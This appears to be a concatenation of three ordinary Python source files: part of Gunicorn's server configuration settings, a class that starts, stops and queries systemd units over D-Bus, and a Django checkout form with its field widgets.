default = 0
desc = """\
The maximum number of requests a worker will process before restarting.
        Any value greater than zero will limit the number of requests a worker
will process before automatically restarting. This is a simple method
to help limit the damage of memory leaks.
If this is set to zero (the default) then the automatic worker
restarts are disabled.
"""
class Timeout(Setting):
name = "timeout"
section = "Worker Processes"
cli = ["-t", "--timeout"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 30
desc = """\
Workers silent for more than this many seconds are killed and restarted.
Generally set to thirty seconds. Only set this noticeably higher if
        you're sure of the repercussions for sync workers. For non-sync
workers it just means that the worker process is still communicating and
is not tied to the length of time required to handle a single request.
"""
class Keepalive(Setting):
name = "keepalive"
section = "Worker Processes"
cli = ["--keep-alive"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 2
desc = """\
The number of seconds to wait for requests on a Keep-Alive connection.
Generally set in the 1-5 seconds range.
"""
class LimitRequestLine(Setting):
name = "limit_request_line"
section = "Security"
cli = ["--limit-request-line"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 4094
desc = """\
        The maximum size of an HTTP request line in bytes.
This parameter is used to limit the allowed size of a client's
HTTP request-line. Since the request-line consists of the HTTP
method, URI, and protocol version, this directive places a
restriction on the length of a request-URI allowed for a request
on the server. A server needs this value to be large enough to
hold any of its resource names, including any information that
might be passed in the query part of a GET request. By default
this value is 4094 and can't be larger than 8190.
        This parameter can be used to help prevent DDoS attacks.
"""
class LimitRequestFields(Setting):
name = "limit_request_fields"
section = "Security"
cli = ["--limit-request-fields"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 100
desc= """\
Limit the number of HTTP headers fields in a request.
Value is a number from 0 (unlimited) to 32768. This parameter is
used to limit the number of headers in a request to prevent DDOS
attack. Used with the `limit_request_field_size` it allows more
safety.
"""
class LimitRequestFieldSize(Setting):
name = "limit_request_field_size"
section = "Security"
cli = ["--limit-request-field_size"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 8190
desc= """\
Limit the allowed size of an HTTP request header field.
Value is a number from 0 (unlimited) to 8190. to set the limit
on the allowed size of an HTTP request header field.
"""
class Debug(Setting):
name = "debug"
section = "Debugging"
cli = ["--debug"]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Turn on debugging in the server.
This limits the number of worker processes to 1 and changes some error
handling that's sent to clients.
"""
class Spew(Setting):
name = "spew"
section = "Debugging"
cli = ["--spew"]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Install a trace function that spews every line executed by the server.
This is the nuclear option.
"""
class ConfigCheck(Setting):
name = "check_config"
section = "Debugging"
cli = ["--check-config",]
validator = validate_bool
action = "store_true"
default = False
desc = """\
        Check the configuration.
"""
class PreloadApp(Setting):
name = "preload_app"
section = "Server Mechanics"
cli = ["--preload"]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Load application code before the worker processes are forked.
By preloading an application you can save some RAM resources as well as
        speed up server boot times. However, if you defer application loading
to each worker process, you can reload your application code easily by
restarting workers.
"""
class Daemon(Setting):
name = "daemon"
section = "Server Mechanics"
cli = ["-D", "--daemon"]
validator = validate_bool
action = "store_true"
default = False
desc = """\
Daemonize the Gunicorn process.
Detaches the server from the controlling terminal and enters the
background.
"""
class Pidfile(Setting):
name = "pidfile"
section = "Server Mechanics"
cli = ["-p", "--pid"]
meta = "FILE"
validator = validate_string
default = None
desc = """\
A filename to use for the PID file.
If not set, no PID file will be written.
"""
class User(Setting):
name = "user"
section = "Server Mechanics"
cli = ["-u", "--user"]
meta = "USER"
validator = validate_user
default = os.geteuid()
desc = """\
Switch worker processes to run as this user.
A valid user id (as an integer) or the name of a user that can be
retrieved with a call to pwd.getpwnam(value) or None to not change
the worker process user.
"""
class Group(Setting):
name = "group"
section = "Server Mechanics"
cli = ["-g", "--group"]
meta = "GROUP"
validator = validate_group
default = os.getegid()
desc = """\
Switch worker process to run as this group.
A valid group id (as an integer) or the name of a user that can be
retrieved with a call to pwd.getgrnam(value) or None to not change
the worker processes group.
"""
class Umask(Setting):
name = "umask"
section = "Server Mechanics"
cli = ["-m", "--umask"]
meta = "INT"
validator = validate_pos_int
type = "int"
default = 0
desc = """\
A bit mask for the file mode on files written by Gunicorn.
Note that this affects unix socket permissions.
A valid value for the os.umask(mode) call or a string compatible with
int(value, 0) (0 means Python guesses the base, so values like "0",
"0xFF", "0022" are valid for decimal, hex, and octal representations)
"""
class TmpUploadDir(Setting):
name = "tmp_upload_dir"
section = "Server Mechanics"
meta = "DIR"
validator = validate_string
default = None
desc = """\
Directory to store temporary request data as they are read.
This may disappear in the near future.
This path should be writable by the process permissions set for Gunicorn
workers. If not specified, Gunicorn will choose a system generated
temporary directory.
"""
class SecureSchemeHeader(Setting):
name = "secure_scheme_headers"
section = "Server Mechanics"
validator = validate_dict
default = {
"X-FORWARDED-PROTOCOL": "ssl",
"X-FORWARDED-SSL": "on"
}
desc = """\
A dictionary containing headers and values that the front-end proxy
uses to indicate HTTPS requests. These tell gunicorn to set
wsgi.url_scheme to "https", so your application can tell that the
request is secure.
The dictionary should map upper-case header names to exact string
values. The value comparisons are case-sensitive, unlike the header
names, so make sure they're exactly what your front-end proxy sends
when handling HTTPS requests.
It is important that your front-end proxy configuration ensures that
the headers defined here can not be passed directly from the client.
"""
class XForwardedFor(Setting):
name = "x_forwarded_for_header"
section = "Server Mechanics"
meta = "STRING"
validator = validate_string
default = 'X-FORWARDED-FOR'
desc = """\
Set the X-Forwarded-For header that identify the originating IP
address of the client connection to gunicorn via a proxy.
"""
class AccessLog(Setting):
name = "accesslog"
section = "Logging"
cli = ["--access-logfile"]
meta = "FILE"
validator = validate_string
default = None
desc = """\
The Access log file to write to.
"-" means log to stderr.
"""
class AccessLogFormat(Setting):
name = "access_log_format"
section = "Logging"
cli = ["--access-logformat"]
meta = "STRING"
validator = validate_string
default = '"%(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"'
desc = """\
        The access log format.
By default:
%(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"
h: remote address
l: '-'
u: currently '-', may be user name in future releases
t: date of the request
r: status line (ex: GET / HTTP/1.1)
s: status
b: response length or '-'
f: referer
a: user agent
T: request time in seconds
        D: request time in microseconds
p: process ID
{Header}i: request header
{Header}o: response header
"""
class ErrorLog(Setting):
name = "errorlog"
section = "Logging"
cli = ["--error-logfile", "--log-file"]
meta = "FILE"
validator = validate_string
default = "-"
desc = """\
The Error log file to write to.
"-" means log to stderr.
"""
class Loglevel(Setting):
name = "loglevel"
section = "Logging"
cli = ["--log-level"]
meta = "LEVEL"
validator = validate_string
default = "info"
desc = """\
The granularity of Error log outputs.
Valid level names are:
* debug
* info
* warning
* error
* critical
"""
class LoggerClass(Setting):
name = "logger_class"
section = "Logging"
cli = ["--logger-class"]
meta = "STRING"
validator = validate_class
default = "simple"
desc = """\
The logger you want to use to log events in gunicorn.
The default class (``gunicorn.glogging.Logger``) handle most of
normal usages in logging. It provides error and access logging.
You can provide your own worker by giving gunicorn a
python path to a subclass like gunicorn.glogging.Logger.
Alternatively the syntax can also load the Logger class
with `egg:gunicorn#simple`
"""
class LogConfig(Setting):
name = "logconfig"
section = "Logging"
cli = ["--log-config"]
meta = "FILE"
validator = validate_string
default = None
desc = """\
The log config file to use.
Gunicorn uses the standard Python logging module's Configuration
file format.
"""
class Procname(Setting):
name = "proc_name"
section = "Process Naming"
cli = ["-n", "--name"]
meta = "STRING"
validator = validate_string
default = None
desc = """\
A base to use with setproctitle for process naming.
This affects things like ``ps`` and ``top``. If you're going to be
running more than one instance of Gunicorn you'll probably want to set a
name to tell them apart. This requires that you install the setproctitle
module.
It defaults to 'gunicorn'.
"""
class DefaultProcName(Setting):
name = "default_proc_name"
section = "Process Naming"
validator = validate_string
default = "gunicorn"
desc = """\
Internal setting that is adjusted for each type of application.
"""
class DjangoSettings(Setting):
name = "django_settings"
section = "Django"
cli = ["--settings"]
meta = "STRING"
validator = validate_string
default = None
desc = """\
The Python path to a Django settings module.
e.g. 'myproject.settings.main'. If this isn't provided, the
DJANGO_SETTINGS_MODULE environment variable will be used.
"""
class DjangoPythonPath(Setting):
name = "pythonpath"
section = "Django"
cli = ["--pythonpath"]
meta = "STRING"
validator = validate_string
default = None
desc = """\
A directory to add to the Python path for Django.
e.g.
'/home/djangoprojects/myproject'.
"""
class OnStarting(Setting):
name = "on_starting"
section = "Server Hooks"
validator = validate_callable(1)
type = "callable"
def on_starting(server):
pass
default = staticmethod(on_starting)
desc = """\
Called just before the master process is initialized.
The callable needs to accept a single instance variable for the Arbiter.
"""
class OnReload(Setting):
name = "on_reload"
section = "Server Hooks"
validator = validate_callable(1)
type = "callable"
def on_reload(server):
for i in range(server.app.cfg.workers):
server.spawn_worker()
default = staticmethod(on_reload)
desc = """\
Called to recycle workers during a reload via SIGHUP.
The callable needs to accept a single instance variable for the Arbiter.
"""
class WhenReady(Setting):
name = "when_ready"
section = "Server Hooks"
validator = validate_callable(1)
type = "callable"
def when_ready(server):
pass
default = staticmethod(when_ready)
desc = """\
Called just after the server is started.
The callable needs to accept a single instance variable for the Arbiter.
"""
class Prefork(Setting):
name = "pre_fork"
section = "Server Hooks"
validator = validate_callable(2)
type = "callable"
def pre_fork(server, worker):
pass
default = staticmethod(pre_fork)
desc = """\
Called just before a worker is forked.
The callable needs to accept two instance variables for the Arbiter and
new Worker.
"""
class Postfork(Setting):
name = "post_fork"
section = "Server Hooks"
validator = validate_callable(2)
type = "callable"
def post_fork(server, worker):
pass
default = staticmethod(post_fork)
desc = """\
Called just after a worker has been forked.
The callable needs to accept two instance variables for the Arbiter and
new Worker.
"""
class PreExec(Setting):
name = "pre_exec"
section = "Server Hooks"
validator = validate_callable(1)
type = "callable"
def pre_exec(server):
pass
default = staticmethod(pre_exec)
desc = """\
Called just before a new master process is forked.
The callable needs to accept a single instance variable for the Arbiter.
"""
class PreRequest(Setting):
name = "pre_request"
section = "Server Hooks"
validator = validate_callable(2)
type = "callable"
def pre_request(worker, req):
worker.log.debug("%s %s" % (req.method, req.path))
default = staticmethod(pre_request)
desc = """\
Called just before a worker processes the request.
The callable needs to accept two instance variables for the Worker and
the Request.
"""
class PostRequest(Setting):
name = "post_request"
section = "Server Hooks"
validator = validate_post_request
type = "callable"
def post_request(worker, req, environ):
pass
default = staticmethod(post_request)
desc = """\
Called after a worker processes the request.
The callable needs to accept two instance variables for the Worker and
the Request.
"""
class WorkerExit(Setting):
name = "worker_exit"
section = "Server Hooks"
validator = validate_callable(2)
type = "callable"
def worker_exit(server, worker):
pass
default = staticmethod(worker_exit)
desc = """\
        Called just after a worker has exited.
The callable needs to accept two instance variables for the Arbiter and
the just-exited Worker.
"""
|
py | b40b5f9c24d913ddf6d66abdfd3f4caf71223bd8 | # Written by Aleksandr Aleksandrov <[email protected]>
#
# Copyright (c) 2016, Emlid Limited
# All rights reserved.
#
# Redistribution and use in source and binary forms,
# with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import dbus
UNIT_INTERFACE = "org.freedesktop.systemd1.Unit"
SERVICE_UNIT_INTERFACE = "org.freedesktop.systemd1.Service"
class SystemdManager(object):
def __init__(self):
self.__bus = dbus.SystemBus()
def list_units(self):
return [
dict(zip([
'unit_name',
'description',
'load_state',
'active_state',
'sub_state',
'follower',
'unit_object_path',
'job_id',
'job_type',
'job_object_path'
], unit))
for unit in self._interface().ListUnits()
]
def list_jobs(self):
return [
dict(zip([
'job_id',
'unit_name',
'job_type',
'job_state',
'job_object_path',
'unit_object_path'
], job))
for job in self._interface().ListJobs()
]
def start_unit(self, unit_name, mode="replace"):
self._interface().StartUnit(unit_name, mode)
return True
def stop_unit(self, unit_name, mode="replace"):
self._interface().StopUnit(unit_name, mode)
return True
def restart_unit(self, unit_name, mode="replace"):
self._interface().RestartUnit(unit_name, mode)
return True
def enable_unit(self, unit_name):
self._interface().EnableUnitFiles(
[unit_name],
dbus.Boolean(False),
dbus.Boolean(True)
)
return True
def disable_unit(self, unit_name):
self._interface().DisableUnitFiles([unit_name], dbus.Boolean(False))
return True
def get_active_state(self, unit_name):
properties = self._get_unit_properties(unit_name, UNIT_INTERFACE)
if properties is None:
return False
return properties["ActiveState"].encode("utf-8") if "ActiveState" in properties else False
def is_active(self, unit_name):
return self.get_active_state(unit_name) == b"active"
def is_failed(self, unit_name):
return self.get_active_state(unit_name) == b"failed"
def get_error_code(self, unit_name):
service_properties = self._get_unit_properties(unit_name, SERVICE_UNIT_INTERFACE)
if service_properties is None:
return None
return self._get_exec_status(service_properties)
def _get_exec_status(self, properties):
return int(properties["ExecMainStatus"]) if "ExecMainStatus" in properties else None
def _get_result(self, properties):
return properties["Result"].encode("utf-8") if "Result" in properties else None
    def _get_unit_properties(self, unit_name, unit_interface):
        try:
            unit_path = self._interface().LoadUnit(unit_name)
            obj = self.__bus.get_object("org.freedesktop.systemd1", unit_path)
            properties_interface = dbus.Interface(obj, "org.freedesktop.DBus.Properties")
            return properties_interface.GetAll(unit_interface)
        except dbus.exceptions.DBusException:
            # Callers such as get_active_state() expect None on failure.
            return None
def _get_unit_file_state(self, unit_name):
return self._interface().GetUnitFileState(unit_name)
def _interface(self):
obj = self.__bus.get_object("org.freedesktop.systemd1", "/org/freedesktop/systemd1")
return dbus.Interface(obj, "org.freedesktop.systemd1.Manager")
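# Editorial usage sketch (hypothetical unit name, not part of the original
# file): restart a unit through the manager and verify it came back up.
def restart_and_verify(manager, unit_name="ssh.service"):
    manager.restart_unit(unit_name)
    if manager.is_failed(unit_name):
        raise RuntimeError("unit %s failed after restart" % unit_name)
    return manager.is_active(unit_name)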
if __name__ == "__main__":
s = SystemdManager()
try:
        for u in s.list_units():
            if u['unit_name'].endswith('.service'):
                print(u['unit_name'])
except dbus.exceptions.DBusException as error:
print(error)
|
py | b40b60503970ec6e87242086033604e9fd70d12d | from django import forms
from checkout.models import Checkout
from django.utils.translation import gettext_lazy as _
class CheckoutForm(forms.ModelForm):
class Meta:
model = Checkout
fields = (
'title',
'enter',
'phone_number',
'company',
'country',
'state',
'city',
'address',
)
widgets = {
'title': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Your name')
}),
'enter': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Enter your here')
}),
'phone_number': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Phone here')
}),
'company': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Company name here...')
}),
'country': forms.Select(attrs={
'class': 'form-control',
'placeholder': _('Country')
}),
'state': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('State')
}),
'city': forms.TextInput(attrs={
'class': 'form-control',
'placeholder': _('Town/City')
}),
'address': forms.Textarea(attrs={
'class': 'form-control',
'placeholder': _('Your address here'),
'cols': 50
}),
        }
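# A minimal view-level sketch (hypothetical names and URL, not part of the
# original app) showing how CheckoutForm would typically be used:
#
#     from django.shortcuts import redirect, render
#
#     def checkout_view(request):
#         form = CheckoutForm(request.POST or None)
#         if request.method == 'POST' and form.is_valid():
#             form.save()
#             return redirect('checkout-done')   # assumed URL name
#         return render(request, 'checkout.html', {'form': form})
|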